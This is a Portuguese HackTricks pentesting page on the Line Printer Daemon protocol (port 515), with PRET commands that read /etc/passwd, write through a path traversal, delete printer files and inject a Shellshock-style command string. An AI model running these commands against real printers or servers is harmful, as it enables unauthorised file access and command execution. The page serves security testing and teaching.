hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

3.7 KiB

Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

O protocolo Line Printer Daemon (LPD) foi originalmente introduzido no Berkeley Unix nos anos 80 (posteriormente especificado pelo RFC1179).
O daemon é executado na porta 515/tcp e pode ser acessado usando o comando lpr. Para imprimir, o cliente envia um arquivo de controle definindo o trabalho/usuário e um arquivo de dados contendo os dados reais a serem impressos. O tipo de entrada do arquivo de dados pode ser definido no arquivo de controle escolhendo entre vários formatos de arquivo. No entanto, cabe à implementação do LPD como realmente lidar com os dados de impressão. Uma implementação popular do LPD para sistemas operacionais semelhantes ao Unix é o LPRng. O LPD pode ser usado como um meio para implantar trabalhos de impressão maliciosos em PostScript ou PJL.

As ferramentas lpdprint e lpdtest estão incluídas no PRET. Elas são uma maneira minimalista de imprimir dados diretamente em uma impressora compatível com LPD ou baixar/upload/excluir arquivos e mais:

lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local

Se você quer aprender mais sobre hackear impressoras leia esta página.

Shodan

  • porta 515
Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks: